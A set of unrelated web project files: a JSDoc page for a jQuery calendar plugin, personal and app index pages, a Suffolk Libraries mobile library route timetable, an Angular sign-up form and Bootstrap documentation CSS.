<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/bootstrap.min.css">
<link type="text/css" rel="stylesheet" href="styles/jaguar.css">
<script>
var config = {"default":{"outputSourceFiles":true},"monospaceLinks":true,"cleverLinks":true};
</script>
</head>
<body>
<div id="wrap" class="clearfix">
<div class="navigation">
<h3 class="applicationName"><a href="index.html"></a></h3>
<div class="search">
<input id="search" type="text" class="form-control input-sm" placeholder="Search Documentations">
</div>
<ul class="list">
<li class="item" data-name="FCalendar">
<span class="title">
<a href="FCalendar.html">FCalendar</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="events itemMembers">
</ul>
</li>
</ul>
</div>
<div class="main">
<h1 class="page-title" data-filename="FCalendar.js.html">Source: FCalendar.js</h1>
<section>
<article>
<pre class="prettyprint source "><code>define(function() {
/**
* @constructor FCalendar
* @desc 日历插件构造函数
* @param { JqueryDOM} obj 渲染日历依赖的 jquery DOM 元素
* @param {Object} [conf] 配置参数@see {@link conf}
*
*/
var FCalendar;
FCalendar = function(obj, conf) {
var fcBody, idx, preview, self, shelf;
self = this;
self._HASLIST = [];
idx = 0;
self.conf = conf;
self.fidx = ++idx;
if (!obj.length) {
return;
}
obj.attr('fc-fidx', idx).addClass('fc-fidx-' + idx + ' ' + (self.conf.theme || 'intact'));
if (!$('#fsycalendar-' + self.conf.theme).length) {
$('<link rel="stylesheet" type="text/css" href="' + SX.eve + '/css/calendar-' + self.conf.theme + '.css" id="fsycalendar-' + self.conf.theme + '"/>').appendTo('head');
}
shelf = _calShelf(self).appendTo(obj);
_changeView(self, obj, null, true);
_bindEvent(obj, self);
if (+self.conf.preview) {
fcBody = shelf.find('.ui-fc-body');
preview = $(_calPreview(self.conf));
$.isFunction(self.conf.beforeShowPreview) && self.conf.beforeShowPreview(preview, obj, self, true);
preview.insertAfter(fcBody);
fcBody.addClass('f-fl br2').css('width', 100 - self.conf.preview + '%');
}
$.isFunction(self.conf.beforeShow) && self.conf.beforeShow(obj, self, true);
shelf.show();
$.isFunction(self.conf.afterShow) && self.conf.afterShow(obj, self, true);
SX.calendars[idx] = self;
return self;
};
/**
* 日历视图刷新方法
* @param {Date|fDateSolar|string|Array} date 需要渲染的日期
* @return {FCalendar} FCalendar实例对象
*/
FCalendar.prototype.changeView = function(date) {
var fcEle, self;
self = this;
fcEle = $('.fc-fidx-' + self.fidx);
_changeView(self, fcEle, date);
$.isFunction(self.conf.beforeShow) && self.conf.beforeShow(fcEle, self, false);
$.isFunction(self.conf.afterShow) && self.conf.afterShow(fcEle, self, false);
return self;
};
/**
* 日期处理函数
* @extends {fDateSolar}
*/
FCalendar.prototype.fDateSolar = fDateSolar;
/**
* 本月有多少天属于上个月
* @param {number|string} y 四位数的年份
* @param {number|string} m 月份
* @return {number} 属于上月的天数
*/
FCalendar.prototype.daysOfPrevMonth = function(y, m) {
var _days, _weekNum;
_weekNum = oDate.dayOfWeek([y, m, 1]);
if (~_weekNum) {
if (_weekNum > this.conf.firstDay) {
_days = _weekNum - this.conf.firstDay;
} else if (_weekNum === +this.conf.firstDay) {
_days = 0;
} else {
_days = 6 - this.conf.firstDay + 1 + _weekNum;
}
}
return _days || 0;
};
/**
* 本月有多少天属于下月
* @param {number|string} y 四位数的年份
* @param {number|string} m 月份
* @return {number} 属于下月的天数
*/
FCalendar.prototype.daysOfNextMonth = function(y, m) {
return (this.conf.weekMode === 'fixed' ? 6 : this.weeksOfMonth(y, m)) * 7 - this.daysOfPrevMonth(y, m) - oDate.daysOfMonth(y, m);
};
/**
* 判断当前视图中月包含几个星期
* @param {number|string} y 四位数年份
* @param {number|string} m 月份
* @param {number|string} [totalDays] 月份一共包含多少天
* @return {number}
*/
FCalendar.prototype.weeksOfMonth = function(y, m, totalDays) {
var overDays;
overDays = (totalDays || oDate.daysOfMonth(y, m)) - 7 + this.daysOfPrevMonth(y, m);
return Math.ceil(overDays / 7) + 1 || 0;
};
/**
* 根据条件返回一个日期范围
* @param
* @return {Array} 日期范围
*/
FCalendar.prototype.limit = function() {
var _arg, _date, _referDate, hasNum, i, range;
_arg = arguments;
if ($.isArray(arguments[0])) {
_arg = arguments[0];
}
range = [];
_referDate = fDateSolar(_arg[2]);
_referDate = _referDate._isLegal && _referDate || fDateSolar();
i = 0;
hasNum = false;
while (i < 2) {
if (_arg[i]) {
if ($.isNumeric(_arg[i])) {
range[i] = _referDate.add(_arg[i]);
hasNum = true;
} else if ((_date = fDateSolar(_arg[i])) && _date._isLegal) {
range[i] = _date;
}
} else {
range[i] = oDate;
}
++i;
}
if (range[0].diff(range[1]) < 0) {
range = [range[1], range[0]];
}
if (_referDate.diff(range[0]) < 0 && _referDate.diff(range[1]) > 0) {
range = [oDate, oDate];
}
return range;
};
return FCalendar;
});
</code></pre>
</article>
</section>
<footer>
Documentation generated by <a href="https://github.com/jsdoc3/jsdoc">JSDoc 3.3.0-alpha5</a> on Wed Aug 12 2015 10:50:50 GMT+0800 (中国标准时间)
</footer>
</div>
</div>
<script>prettyPrint();</script>
<script src="scripts/linenumber.js"></script>
<script src="scripts/main.js"></script>
</body>
</html>
|
index.html
|
mjschindler/mjschindler.github.io
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>MJ Schindler's Dev Bootcamp Project Website</title>
<link rel="stylesheet" type="text/css" href="stylesheets/default.css">
</head>
<header id="title">
<h1><a href="http://mjschindler.github.io/index.html">MJ @ DBC</a></h1>
<nav>
<ul>
<li><a href="http://mjschindler.github.io/Peer-Pairing/gps1-2.html">pair programming</a></li>
<li><a href="http://mjschindler.github.io/blog-index.html">blog</a></li>
<li><a href="#">portfolio</a></li>
<li><a href="#">contact</a></li>
<li><a href="#">about</a></li>
</ul></nav>
</header>
<body>
<article class="callToAction transparent">
<h1>What Happens Inside Dev Bootcamp?</h1>
<h4>My Journey From Digital Marketer to Web Developer</h4>
</article>
</body>
<footer>
<ul>
<li><a href="https://twitter.com/mjschindler">twitter</a></li>
<li><a href="https://www.linkedin.com/in/marthajeanschindler">linkedin</a></li>
<li><a href="https://github.com/mjschindler">github</a></li>
<li><a href="http://www.mjschindler.com/">mjschindler.com</a></li>
</ul>
</footer>
</html>
|
src/index.html
|
AdrielLimanthie/carousell-reddit
|
<!doctype html>
<html lang="en">
<head>
<title>Reddit for Carousell</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<div id="root" style="height: 100%"></div>
</body>
</html>
|
_site/mobiles-home/saxmundham-mobile-library-route-4/index.html
|
suffolklibraries/sljekyll
|
<!doctype html>
<html lang="en-gb">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex, nofollow">
<!--[if lt IE 9]>
<script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv-printshiv.min.js"></script>
<![endif]-->
<title>Leiston Mobile Library Route 4 – Suffolk Libraries</title>
<link rel="stylesheet" href="/css/style.css">
<link rel="preload" as="font" type="font/woff2" href="/fonts/source-sans-pro-v11-latin-regular.woff2">
<link rel="preload" as="font" type="font/woff2" href="/fonts/source-sans-pro-v11-latin-italic.woff2">
<link rel="preload" as="font" type="font/woff2" href="/fonts/source-sans-pro-v11-latin-700.woff2">
</head>
<body class="custom-sans-serif lh-copy dark-gray bg-moon-gray">
<ul class="clip">
<li><a href="#content">Skip to content</a></li>
<li><a href="#footer-nav">Skip to navigation menu</a></li>
</ul>
<div class="bg-black white pa2 ph3-ns">
<div class="custom-max-width">
<p class="f6 ma0 custom-lh-title"><span role='image' aria-label='Debit card' class='pr1'>💳</span> You can now pay online. <a href="
https://suffolk.spydus.co.uk/cgi-bin/spydus.exe/MSGTRN/OPAC/LOGINB?RDT=/SpydusCitizenPay/default.aspx
" class="underline lightest-blue">
Pay charges now →
</a></p>
</div>
</div>
<header id="site-header" class="custom-lh-title">
<div class="bg-white dark-gray ph2 ph3-ns pt2 pt3-ns">
<div class="custom-max-width flex">
<div class="w-30">
<a href="/"><img src="/images/logos/sl.svg" class="v-btm w3 w4-ns" alt="Suffolk Libraries"></a>
</div>
<div class="w-70 flex justify-end items-center">
<div><a href="/support-us/" class="dib blue pv1 pv2-ns f7 f6-ns pr2">Donate</a></div>
<div><a href="/help/joining-the-library/" class="dib custom-icon custom-icon-card blue pv1 pv2-ns f7 f6-ns">Join</a></div>
<div><a href="https://suffolk.spydus.co.uk/cgi-bin/spydus.exe/MSGTRN/OPAC/LOGINB" class="dib custom-icon custom-icon-lock blue pv1 pv2-ns ml2 f7 f6-ns">Login</a></div>
<div><a href="/search-form/" class="dib custom-icon custom-icon-search blue ml2 pv1 pv2-ns f7 f6-ns">Search</a></div>
</div>
</div>
</div>
<div class="custom-bg-corporate white ph2 ph3-ns bb b--white">
<div class="custom-max-width">
<ul class="ma0 pa0 list f6">
<li class="dib mr2 mr3-l"><a href="/" class="white underline db pv2">Home</a></li>
<li class="dib mr2 mr3-l"><a href="/elibrary/" class="white underline db pv2">eLibrary</a></li>
<li class="dib mr2 mr3-l"><a href="/events-activities/online-and-streamed-events/" class="white underline db pv2">Online events</a></li>
<li class="dib mr2 mr3-l"><a href="/help/" class="white underline db pv2">Help</a></li>
<li class="dib mr2 mr3-l"><a href="/contact/" class="white underline db pv2">Contact</a></li>
<!-- <li class="dib mr2 mr3-l"><a href="/about/" class="white underline db pv2">About</a></li>
<li class="dib"><a class="white underline db pv2" href="/support-us/">Donate</a></li> -->
</ul>
</div>
</div>
</header>
<div class="pv2 pv3-ns cf custom-max-width
">
<main id="content" class="bg-white pa2 pa5-ns pv4-ns cf mb2 border-box b--light-gray
" role="main">
<div class="pa2 ph3-ns bg-white ba b--light-gray custom-underline f6">
<a class="blue underline" href="/">Home</a>
→ <a class="blue underline" href="/mobiles-home/">Mobiles home</a>
→ Leiston Mobile Library Route 4
</div>
<div class="custom-narrow-width">
<header class="mt3">
<h1 class="custom-lh-title f2 pa0 ma0 mb3
">Leiston Mobile Library Route 4</h1>
</header>
<div class="lh-copy custom-hyphens custom-prose
custom-visited custom-underline">
<h2 id="contact-us">Contact us:</h2>
<p>Manager: Rob Alcraft and Peter Fiske</p>
<p>Email: <a href="mailto:help@suffolklibraries.co.uk?subject=Mobile%20library%20enquiry">help@suffolklibraries.co.uk</a></p>
<p>Telephone: 07743 185353</p>
<h2 id="route-timetable">Route timetable</h2>
<table class="pure-table">
<tr>
<td valign="bottom" width="44">
<strong>Stop</strong>
</td>
<td valign="bottom" width="139">
<strong>Village</strong>
</td>
<td valign="bottom" width="176">
<strong>Location</strong>
</td>
<td valign="bottom" width="97">
<strong>Time</strong>
</td>
</tr>
<tr>
<td valign="bottom" width="44">
4A
</td>
<td valign="bottom" width="139">
Kelsale
</td>
<td valign="bottom" width="176">
Guildhall
</td>
<td valign="bottom" width="97">
0920 – 0945
</td>
</tr>
<tr>
<td valign="bottom" width="44">
4B
</td>
<td valign="bottom" width="139">
Yoxford
</td>
<td valign="bottom" width="176">
The Griffin PH
</td>
<td valign="bottom" width="97">
0955 – 1030
</td>
</tr>
<tr>
<td valign="bottom" width="44">
4C
</td>
<td valign="bottom" width="139">
Darsham
</td>
<td valign="bottom" width="176">
Village Hall
</td>
<td valign="bottom" width="97">
1040 – 1100
</td>
</tr>
<tr>
<td valign="bottom" width="44">
4D
</td>
<td valign="bottom" width="139">
Darsham
</td>
<td valign="bottom" width="176">
Church
</td>
<td valign="bottom" width="97">
1105 – 1130
</td>
</tr>
<tr>
<td valign="bottom" width="44">
4E
</td>
<td valign="bottom" width="139">
Westleton
</td>
<td valign="bottom" width="176">
Village Hall
</td>
<td valign="bottom" width="97">
1140 – 1215
</td>
</tr>
<tr>
<td valign="bottom" width="44">
4F
</td>
<td valign="bottom" width="139">
Dunwich
</td>
<td valign="bottom" width="176">
Little Greyfriars
</td>
<td valign="bottom" width="97">
1220 – 1250
</td>
</tr>
<tr>
<td valign="bottom" width="44">
4G
</td>
<td valign="bottom" width="139">
Walberswick
</td>
<td valign="bottom" width="176">
Village Hall
</td>
<td valign="bottom" width="97">
1415 – 1445
</td>
</tr>
<tr>
<td valign="bottom" width="44">
4H
</td>
<td valign="bottom" width="139">
Middleton
</td>
<td valign="bottom" width="176">
Bell Inn
</td>
<td valign="bottom" width="97">
1515 – 1550
</td>
</tr>
</table>
<p><strong>Calling every 4 weeks on Fridays:</strong></p>
<p><strong>2020:</strong> 10 January, 7 February, 6 March, 3 April, 1 May, 28 May, 26 June, 24 July, 21 August, 18 September, 16 October, 13 November, 11 December</p>
</div>
</div>
</main>
</div>
<footer id="footer" class="pa2 pt3 pa3-ns pt4-ns bg-near-black white custom-underline">
<div class="custom-max-width">
<div class="flex-l justify-between-l">
<div class="w-30-l mb4 f6">
<section class="pb4">
<h2 class="f6 f5-ns pa0 ma0 mb2 tracked ttu normal
">Do it online</h2>
<ul class="list pa0 ma0">
<li class="mb2 mb1-ns"><a href="https://suffolk.spydus.co.uk" class="link light-gray hover-white">Search & reserve</a></li>
<li class="mb2 mb1-ns"><a href="https://suffolk.spydus.co.uk/cgi-bin/spydus.exe/MSGTRN/OPAC/LOGINB" class="link light-gray hover-white">Login & renew</a></li>
<li class="mb2 mb1-ns"><a class="link light-gray hover-white" href="/elibrary">eLibrary</a></li>
<li class="mb2 mb1-ns"><a href="/help/joining-the-library/" class="link light-gray hover-white">Get a library card</a></li>
</ul>
</section>
<section class="pb4">
<h2 class="f6 f5-ns pa0 ma0 mb2 tracked ttu normal
">Support your library</h2>
<p>We're a charity that makes life in Suffolk better for thousands of people.</p>
<p class="ma0"><a class="b pa1 br2 custom-bg-corporate-green hover-bg-green white custom-no-underline" href="/support-us">Donate</a></p>
</section>
</div>
<div class="w-30-l mb4 f6">
<section class="pb4">
<h2 class="f6 f5-ns pa0 ma0 mb2 tracked ttu normal
">Contact us</h2>
<ul class="list pa0 ma0">
<li class="mb2 mb1-ns"><a href="tel:01473351249" class="link light-gray hover-white">01473 351249</a></li>
<li class="mb2 mb1-ns"><a href="mailto:help@suffolklibraries.co.uk" class="link light-gray hover-white">help@suffolklibraries.co.uk</a></li>
</ul>
</section>
<section class="pb4">
<h2 class="f6 f5-ns pa0 ma0 mb2 tracked ttu normal
">Social media</h2>
<ul class="list pa0 ma0">
<li class="mb2 mb1-ns"><a href="http://facebook.com/suffolklibraries" class="link light-gray hover-white">Facebook</a></li>
<li class="mb2 mb1-ns"><a href="https://www.youtube.com/user/SuffolkLibraries/" class="link light-gray hover-white">YouTube</a></li>
<li class="mb2 mb1-ns"><a href="http://twitter.com/suffolklibrary" class="link light-gray hover-white">Twitter</a></li>
<li class="mb2 mb1-ns"><a href="https://instagram.com/suffolklibraries" class="link light-gray hover-white">Instagram</a></li>
<li class="mb2 mb1-ns"><a href="https://www.linkedin.com/company/suffolk-libraries/" class="link light-gray hover-white">LinkedIn</a></li>
<li class="mb2 mb1-ns"><a href="/newsletter" class="link light-gray hover-white">Email newsletter</a></li>
</ul>
</section>
</div>
<div class="w-30-l mb4 f6">
<nav class="pb4" id="footer-nav">
<h2 class="f6 f5-ns pa0 ma0 mb2 tracked ttu normal
">Sections</h2>
<ul class="list pa0 ma0">
<li class="mb2 mb1-ns"><a href="/elibrary/" class="link light-gray hover-white">eLibrary</a></li>
<li class="mb2 mb1-ns"><a href="/libraries/" class="link light-gray hover-white">Libraries</a></li>
<li class="mb2 mb1-ns"><a href="/mobiles-home/" class="link light-gray hover-white">Mobile & home service</a></li>
<li class="mb2 mb1-ns"><a href="/help/" class="link light-gray hover-white">Help using the service</a></li>
<li class="mb2 mb1-ns"><a href="/new-suggestions/" class="link light-gray hover-white">Recommendations & reviews</a></li>
<li class="mb2 mb1-ns"><a href="/events-activities/" class="link light-gray hover-white">Events & activities</a></li>
<li class="mb2 mb1-ns"><a href="/research-and-reference/" class="link light-gray hover-white">Research & reference</a></li>
<li class="mb2 mb1-ns"><a href="/parents-carers-and-children/" class="link light-gray hover-white">Parents, carers & children</a></li>
<li class="mb2 mb1-ns"><a href="/teachers-and-home-educators/" class="link light-gray hover-white">Teachers & home educators</a></li>
<li class="mb2 mb1-ns"><a href="/health/" class="link light-gray hover-white">Health & wellbeing</a></li>
<li class="mb2 mb1-ns"><a href="/help-with-reading-and-literacy/" class="link light-gray hover-white">Help with reading & literacy</a></li>
<li class="mb2 mb1-ns"><a href="/work-and-benefits/" class="link light-gray hover-white">Work & benefits</a></li>
<li class="mb2 mb1-ns"><a href="/business-and-room-hire/" class="link light-gray hover-white">Business & room hire</a></li>
<li class="mb2 mb1-ns"><a href="/bloc/" class="link light-gray hover-white">BLOC</a></li>
<li class="mb2 mb1-ns"><a href="/music-and-drama/" class="link light-gray hover-white">Music & Drama Library</a></li>
<li class="mb2 mb1-ns"><a href="/news/" class="link light-gray hover-white">News</a></li>
<li class="mb2 mb1-ns"><a href="/about/jobs/" class="link light-gray hover-white">Jobs</a></li>
<li class="mb2 mb1-ns"><a href="/volunteer/" class="link light-gray hover-white">Volunteering</a></li>
<li class="mb2 mb1-ns"><a href="/about/" class="link light-gray hover-white">About us</a></li>
</ul>
</nav>
</div>
</div>
<section class="pb4 f6">
<h2 class="f6 f5-ns pa0 ma0 mb2 tracked ttu normal
">Privacy & cookies</h2>
<ul class="list pa0 ma0">
<li class="mb2 mb1-ns">Find out what cookies we use and how we use your data: <a href="/help/privacy-and-cookies/" class="light-gray underline hover-white">our privacy policies</a>.</li>
<li class="mb2 mb1-ns"><a href="/about/jobs/privacy-notice-for-job-applicants/" class="light-gray underline hover-white">Privacy notice for job applicants</a></li>
</ul>
</section>
<div class="pb4 f6">
<p class="ma0 light-gray">Suffolk Libraries HMRC charity number XT34476. Registered company number IP031542.</p>
</div>
</div>
</footer>
</body>
</html>
|
app/pages/talks/talks.common.css
|
fvonberg/SpeakerRating-NativeScript
|
.cardViewAuthor {
font-weight: bold;
}
/*.cardViewHeading {
color: #339966;
}*/
|
admin/src/app/pages/register/register.html
|
bigfish-hu/remarker
|
<div class="auth-main">
<div class="auth-block">
<h1 i18n>Sign up to RemarkerAdmin</h1>
<a routerLink="/login" class="auth-link" i18n>Already have an account? Sign in!</a>
<form [formGroup]="form" (ngSubmit)="onSubmit(form.value)" class="form-horizontal">
<div class="form-group row" [ngClass]="{'has-error': (!name.valid && name.touched), 'has-success': (name.valid && name.touched)}">
<label for="inputName3" class="col-sm-2 control-label" i18n>Name</label>
<div class="col-sm-10">
<input [formControl]="name" type="text" class="form-control" id="inputName3" placeholder="Full Name">
</div>
</div>
<div class="form-group row" [ngClass]="{'has-error': (!email.valid && email.touched), 'has-success': (email.valid && email.touched)}">
<label for="inputEmail3" class="col-sm-2 control-label" i18n>Email</label>
<div class="col-sm-10">
<input [formControl]="email" type="email" class="form-control" id="inputEmail3" placeholder="Email">
</div>
</div>
<div class="form-group row" [ngClass]="{'has-error': (!password.valid && password.touched), 'has-success': (password.valid && password.touched)}">
<label for="inputPassword3" class="col-sm-2 control-label" i18n>Password</label>
<div class="col-sm-10">
<input [formControl]="password" type="password" class="form-control" id="inputPassword3" placeholder="Password">
</div>
</div>
<div class="form-group row" [ngClass]="{'has-error': (!repeatPassword.valid && repeatPassword.touched), 'has-success': (repeatPassword.valid && repeatPassword.touched)}">
<label for="inputPassword4" class="col-sm-2 control-label" i18n>Repeat</label>
<div class="col-sm-10">
<input [formControl]="repeatPassword" type="password" class="form-control" id="inputPassword4" placeholder="Repeat">
<span *ngIf="!passwords.valid && (password.touched || repeatPassword.touched)" class="help-block sub-little-text" i18n>Passwords don't match.</span>
</div>
</div>
<div class="form-group row">
<div class="col-sm-offset-2 col-sm-10">
<button [disabled]="!form.valid" type="submit" class="btn btn-default btn-auth" i18n>Sign up</button>
</div>
</div>
</form>
</div>
</div>
|
lib/qless/server/static/css/docs.css
|
seomoz/qless
|
/* Add additional stylesheets below
-------------------------------------------------- */
/*
Bootstrap's documentation styles
Special styles for presenting Bootstrap's documentation and examples
*/
/* Body and structure
-------------------------------------------------- */
body {
position: relative;
padding-top: 90px;
background-color: #fff;
background-repeat: repeat-x;
background-position: 0 40px;
}
/* Faded out hr */
hr.soften {
height: 1px;
margin: 54px 0;
background-image: -webkit-linear-gradient(left, rgba(0,0,0,0), rgba(0,0,0,.1), rgba(0,0,0,0));
background-image: -moz-linear-gradient(left, rgba(0,0,0,0), rgba(0,0,0,.1), rgba(0,0,0,0));
background-image: -ms-linear-gradient(left, rgba(0,0,0,0), rgba(0,0,0,.1), rgba(0,0,0,0));
background-image: -o-linear-gradient(left, rgba(0,0,0,0), rgba(0,0,0,.1), rgba(0,0,0,0));
border: 0;
}
/* Jumbotrons
-------------------------------------------------- */
.jumbotron {
position: relative;
}
.jumbotron h1 {
margin-bottom: 9px;
font-size: 81px;
font-weight: bold;
letter-spacing: -1px;
line-height: 1;
}
.jumbotron p {
margin-bottom: 18px;
font-weight: 300;
}
.jumbotron .btn-large {
font-size: 20px;
font-weight: normal;
padding: 14px 24px;
margin-right: 10px;
-webkit-border-radius: 6px;
-moz-border-radius: 6px;
border-radius: 6px;
}
.jumbotron .btn-large small {
font-size: 14px;
}
/* Masthead (docs home) */
.masthead {
padding-top: 36px;
margin-bottom: 72px;
}
.masthead h1,
.masthead p {
text-align: center;
}
.masthead h1 {
margin-bottom: 18px;
}
.masthead p {
margin-left: 5%;
margin-right: 5%;
font-size: 30px;
line-height: 36px;
}
/* Specific jumbotrons
------------------------- */
/* supporting docs pages */
.subhead {
padding-bottom: 0;
margin-bottom: 9px;
}
.subhead h1 {
font-size: 54px;
}
/* Subnav */
.subnav {
width: 100%;
height: 36px;
background-color: #eeeeee; /* Old browsers */
background-repeat: repeat-x; /* Repeat the gradient */
background-image: -moz-linear-gradient(top, #f5f5f5 0%, #eeeeee 100%); /* FF3.6+ */
background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f5f5f5), color-stop(100%,#eeeeee)); /* Chrome,Safari4+ */
background-image: -webkit-linear-gradient(top, #f5f5f5 0%,#eeeeee 100%); /* Chrome 10+,Safari 5.1+ */
background-image: -ms-linear-gradient(top, #f5f5f5 0%,#eeeeee 100%); /* IE10+ */
background-image: -o-linear-gradient(top, #f5f5f5 0%,#eeeeee 100%); /* Opera 11.10+ */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f5f5f5', endColorstr='#eeeeee',GradientType=0 ); /* IE6-9 */
background-image: linear-gradient(top, #f5f5f5 0%,#eeeeee 100%); /* W3C */
border: 1px solid #e5e5e5;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
}
.subnav .nav {
margin-bottom: 0;
}
.subnav .nav > li > a {
margin: 0;
padding-top: 11px;
padding-bottom: 11px;
border-left: 1px solid #f5f5f5;
border-right: 1px solid #e5e5e5;
-webkit-border-radius: 0;
-moz-border-radius: 0;
border-radius: 0;
}
.subnav .nav > .active > a,
.subnav .nav > .active > a:hover {
padding-left: 13px;
color: #777;
background-color: #e9e9e9;
border-right-color: #ddd;
border-left: 0;
-webkit-box-shadow: inset 0 3px 5px rgba(0,0,0,.05);
-moz-box-shadow: inset 0 3px 5px rgba(0,0,0,.05);
box-shadow: inset 0 3px 5px rgba(0,0,0,.05);
}
.subnav .nav > .active > a .caret,
.subnav .nav > .active > a:hover .caret {
border-top-color: #777;
}
.subnav .nav > li:first-child > a,
.subnav .nav > li:first-child > a:hover {
border-left: 0;
padding-left: 12px;
-webkit-border-radius: 4px 0 0 4px;
-moz-border-radius: 4px 0 0 4px;
border-radius: 4px 0 0 4px;
}
.subnav .nav > li:last-child > a {
border-right: 0;
}
.subnav .dropdown-menu {
-webkit-border-radius: 0 0 4px 4px;
-moz-border-radius: 0 0 4px 4px;
border-radius: 0 0 4px 4px;
}
/* Fixed subnav on scroll, but only for 980px and up (sorry IE!) */
@media (min-width: 980px) {
.subnav-fixed {
position: fixed;
top: 40px;
left: 0;
right: 0;
z-index: 1020; /* 10 less than .navbar-fixed to prevent any overlap */
border-color: #d5d5d5;
border-width: 0 0 1px; /* drop the border on the fixed edges */
-webkit-border-radius: 0;
-moz-border-radius: 0;
border-radius: 0;
-webkit-box-shadow: inset 0 1px 0 #fff, 0 1px 5px rgba(0,0,0,.1);
-moz-box-shadow: inset 0 1px 0 #fff, 0 1px 5px rgba(0,0,0,.1);
box-shadow: inset 0 1px 0 #fff, 0 1px 5px rgba(0,0,0,.1);
filter: progid:DXImageTransform.Microsoft.gradient(enabled=false); /* IE6-9 */
}
.subnav-fixed .nav {
width: 938px;
margin: 0 auto;
padding: 0 1px;
}
.subnav .nav > li:first-child > a,
.subnav .nav > li:first-child > a:hover {
-webkit-border-radius: 0;
-moz-border-radius: 0;
border-radius: 0;
}
}
/* Quick links
-------------------------------------------------- */
.bs-links {
margin: 36px 0;
}
.quick-links {
min-height: 30px;
margin: 0;
padding: 5px 20px;
list-style: none;
text-align: center;
overflow: hidden;
}
.quick-links:first-child {
min-height: 0;
}
.quick-links li {
display: inline;
margin: 0 5px;
color: #999;
}
.quick-links .github-btn,
.quick-links .tweet-btn,
.quick-links .follow-btn {
position: relative;
top: 5px;
}
/* Marketing section of Overview
-------------------------------------------------- */
.marketing .row {
margin-bottom: 9px;
}
.marketing h1 {
margin: 36px 0 27px;
font-size: 40px;
font-weight: 300;
text-align: center;
}
.marketing h2,
.marketing h3 {
font-weight: 300;
}
.marketing h2 {
font-size: 22px;
}
.marketing p {
margin-right: 10px;
}
.marketing .bs-icon {
float: left;
margin: 7px 10px 0 0;
opacity: .8;
}
.marketing .small-bs-icon {
float: left;
margin: 4px 5px 0 0;
}
/* Footer
-------------------------------------------------- */
.footer {
margin-top: 45px;
padding: 35px 0 36px;
border-top: 1px solid #e5e5e5;
}
.footer p {
margin-bottom: 0;
color: #555;
}
/* Special grid styles
-------------------------------------------------- */
.show-grid {
margin-top: 10px;
margin-bottom: 20px;
}
.show-grid [class*="span"] {
background-color: #eee;
text-align: center;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
min-height: 30px;
line-height: 30px;
}
.show-grid:hover [class*="span"] {
background: #ddd;
}
.show-grid .show-grid {
margin-top: 0;
margin-bottom: 0;
}
.show-grid .show-grid [class*="span"] {
background-color: #ccc;
}
/* Render mini layout previews
-------------------------------------------------- */
.mini-layout {
border: 1px solid #ddd;
-webkit-border-radius: 6px;
-moz-border-radius: 6px;
border-radius: 6px;
-webkit-box-shadow: 0 1px 2px rgba(0,0,0,.075);
-moz-box-shadow: 0 1px 2px rgba(0,0,0,.075);
box-shadow: 0 1px 2px rgba(0,0,0,.075);
}
.mini-layout {
height: 240px;
margin-bottom: 20px;
padding: 9px;
}
.mini-layout div {
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
}
.mini-layout .mini-layout-body {
background-color: #dceaf4;
margin: 0 auto;
width: 70%;
height: 240px;
}
.mini-layout.fluid .mini-layout-sidebar,
.mini-layout.fluid .mini-layout-header,
.mini-layout.fluid .mini-layout-body {
float: left;
}
.mini-layout.fluid .mini-layout-sidebar {
background-color: #bbd8e9;
width: 20%;
height: 240px;
}
.mini-layout.fluid .mini-layout-body {
width: 77.5%;
margin-left: 2.5%;
}
/* Popover docs
-------------------------------------------------- */
.popover-well {
min-height: 160px;
}
.popover-well .popover {
display: block;
}
.popover-well .popover-wrapper {
width: 50%;
height: 160px;
float: left;
margin-left: 55px;
position: relative;
}
.popover-well .popover-menu-wrapper {
height: 80px;
}
.large-bird {
margin: 5px 0 0 310px;
opacity: .1;
}
/* Download page
-------------------------------------------------- */
.download .page-header {
margin-top: 36px;
}
.page-header .toggle-all {
margin-top: 5px;
}
/* Space out h3s when following a section */
.download h3 {
margin-bottom: 5px;
}
.download-builder input + h3,
.download-builder .checkbox + h3 {
margin-top: 9px;
}
/* Fields for variables */
.download-builder input[type=text] {
margin-bottom: 9px;
font-family: Menlo, Monaco, "Courier New", monospace;
font-size: 12px;
color: #d14;
}
.download-builder input[type=text]:focus {
background-color: #fff;
}
/* Custom, larger checkbox labels */
.download .checkbox {
padding: 6px 10px 6px 25px;
color: #555;
background-color: #f9f9f9;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
cursor: pointer;
}
.download .checkbox:hover {
color: #333;
background-color: #f5f5f5;
}
.download .checkbox small {
font-size: 12px;
color: #777;
}
/* Variables section */
#variables label {
margin-bottom: 0;
}
/* Giant download button */
.download-btn {
margin: 36px 0 108px;
}
#download p,
#download h4 {
max-width: 50%;
margin: 0 auto;
color: #999;
text-align: center;
}
#download h4 {
margin-bottom: 0;
}
#download p {
margin-bottom: 18px;
}
.download-btn .btn {
display: block;
width: auto;
padding: 19px 24px;
margin-bottom: 27px;
font-size: 30px;
line-height: 1;
text-align: center;
-webkit-border-radius: 6px;
-moz-border-radius: 6px;
border-radius: 6px;
}
/* Color swatches on LESS docs page
-------------------------------------------------- */
/* Sets the width of the td */
.swatch-col {
width: 30px;
}
/* Le swatch */
.swatch {
display: inline-block;
width: 30px;
height: 20px;
margin: -6px 0;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
}
/* For white swatches, give a border */
.swatch-bordered {
width: 28px;
height: 18px;
border: 1px solid #eee;
}
/* Misc
-------------------------------------------------- */
img {
max-width: 100%;
}
/* Make tables spaced out a bit more */
h2 + table,
h3 + table,
h4 + table,
h2 + .row {
margin-top: 5px;
}
/* Example sites showcase */
.example-sites img {
max-width: 100%;
margin: 0 auto;
}
.marketing-byline {
margin: -18px 0 27px;
font-size: 18px;
font-weight: 300;
line-height: 24px;
color: #999;
text-align: center;
}
